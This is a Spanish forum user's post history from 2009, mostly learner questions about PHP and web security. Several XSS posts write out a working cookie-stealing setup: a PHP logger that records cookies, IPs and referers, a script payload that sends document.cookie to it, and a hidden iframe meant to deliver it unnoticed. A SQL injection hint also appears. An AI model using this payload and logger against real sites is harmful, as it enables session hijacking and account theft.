elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: [1] 2 3
1  Programación / PHP / [ayuda] redimensionar imagenes en: 12 Marzo 2009, 15:00 pm
Hola buenas,
Bueno pues tengo una duda,

estoy haciendo una web en la que lo usuarios pueden subir fotos, pero lo que quiero es que se queden todas iguales y a ser posible escribir un mensaje en la imagen (por ejemplo el nombre de la web). Se podría hacer que al subirse ya se redimensine y se guarde?

Si alguién lo ha hecho alguna vez, le agradecería si me podría prestar el código.

Un saludo y gracias de antemano.
2  Seguridad Informática / Nivel Web / Re: Inyeccion sql (mysql) Pasa x alto la inyeccion en: 5 Marzo 2009, 22:56 pm
Leete algun pequeño doc de MySQL para que veas como va, después puedes leerte ese paper que te pasé, lo entenderás bastante bien.

Un saludo.
3  Seguridad Informática / Nivel Web / Re: Inyeccion sql (mysql) Pasa x alto la inyeccion en: 5 Marzo 2009, 21:35 pm
Estás utilizando 15 columnas, el error que te tira es porque ay más o menos columnas, vamos que ese numero de columnas no es.

puedes probar un ' order by

leete este paper, lo explica bastante bien: http://www.milw0rm.com/papers/216

Saludos.
4  Seguridad Informática / Nivel Web / Re: Duda sobre XSS en: 4 Marzo 2009, 01:08 am
yeee

me hize un archivo llamado entra.php con lo que comentaste del iframe:

Código
  1. <?php
  2. $xss = urlencode("<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>");
  3. ?>
  4.  
  5. <html>
  6. <iframe src="http://localhost/xss/vuln.php?vuln=<?=$xss?>" width="1" height="1" frameborder="0"></iframe>
  7. </html>

Al parecer lo del iframe si es buena idea ya que como no ponga un sniffer y vea los request dudo que se de nadie cuenta. Con <img entonces no se puede hacer verdad?

intente:
<img src="http://localhost/xss/vuln.php?vuln=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Flocalhost%2Fxss%2Fxss.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E">

pero no me envia nada al archivo donde almaceno las cookies, vamos no va al window.location.
Con la librería gd de php se podría hacer que carge una imagen y a la vez haga una petición a la web enviandonos la cookie, no? o esto solo sirve para CSRF?

Un saludo, gracias por las respuestas.
5  Seguridad Informática / Nivel Web / Re: Duda sobre XSS en: 2 Marzo 2009, 23:15 pm
pero tu lo que estás haciendo hay es para que meta en $_COOKIE['x'] el XSS.
Yo lo que quiero es un XSS normal, la sesion nomas la creaba para que document.cookie tendría un valor y poder insertalo a mi archivo donde se guardarán las cookies.

Con el echo $_GET['x']; insertaba el XSS y enviaba a mi registrador de cookies el PHPSESSID.
No se si me entiendes. Aunque tb lo podría haber hecho asi, creo..:
Código
  1. <?php
  2. if(!$_COOKIE['x']){
  3.       setcookie('x', 'test');
  4. }
  5. echo $_GET['vuln'];
  6. ?>

Despues haciendo http://localhost/test.php?vuln=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Obtendría: x=test

Saludos.
6  Seguridad Informática / Nivel Web / Re: Duda sobre XSS en: 2 Marzo 2009, 14:29 pm
Pues para hacer pruebas hize esto que es simple y crea una sesión para que me guarde el PHPSESSID:

Código
  1. <?php
  2. /* VULN XSS */
  4. $_SESSION['x'] =  true;
  5. echo $_GET['x'];
  6.  
  7. ?>

por cierto que diferencia hay entre una cookie y una sesión?

Saludos y gracias por la ayuda
 ;)
7  Seguridad Informática / Nivel Web / Re: Duda sobre XSS en: 2 Marzo 2009, 08:07 am
yo tengo xss.php:
Código
  1. <?php
  2. $archivo = fopen('log.html','a');
  3.  
  4. $cookie = $_GET['cookie'];
  5. $ip = $_SERVER['REMOTE_ADDR'];
  6. $re = $_SERVER['HTTP_REFERER'];
  7. $fecha=date("j F, Y, g:i a");
  8.  
  9. fwrite($archivo, '<hr>Cookie: '.$cookie.'<br>Viene de: '.$re.'<br> IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
  10. fclose($archivo);
  11. ?>

lo que quiero es que al abrir prueba.html que es:
Código
  3. <title>PRUEBAS XSS</title>
  5. <img src="http://localhost/xss/vuln.php?x=<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>">
  6. </body>
  7. </html>

se ejecute el XSS y se me envie a log.html la cookie.
Espero que me entiendan, gracias por las respuestas.

Saludos,
8  Seguridad Informática / Nivel Web / Duda sobre XSS en: 2 Marzo 2009, 01:52 am
Bueno me he puesto a leer un poco sobre XSS y hacer pruebas en mi localhost, hize un script vulnerable a XSS (vuln.php) y otro que recoge la cookie (xss.php) por la variable 'cookie'.

Entonces si entraría a:
http://localhost/xss/vuln.php?x=<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>

en un archivo llamado log.html se me escribiría la cookie, bien...
No podría meter ese enlace entre etiquetas <img> por ejemplo:

prueba.html
<img src="http://localhost/xss/vuln.php?x=<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>">

para que cuando habra prueba.html se envie la petición get con esa url y se guarde la cookie menos sospechosamente?

Intente hacerlo asi y no me rulo, pase la url por urlencode() y tampoco.

Un saludo y gracias de antemano  ;)
9  Programación / PHP / Re: Proteger login contra bruteforcers en: 2 Marzo 2009, 01:45 am
Como hariais lo del campo oculto con una sesion?

Saludos y gracias por las respuestas.
10  Programación / PHP / Re: Proteger login contra bruteforcers en: 27 Febrero 2009, 21:24 pm
Si, lo del bloqueo IP ya lo hize para la administración  ;D
Quiero aprender más metodos para no tener que hacerlo en cualquier formulario...

Nose si alguien conoce lo que digo del <input type="hidden" value="algo aleatorio">
Si me pueden echar una mano, gracias!
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines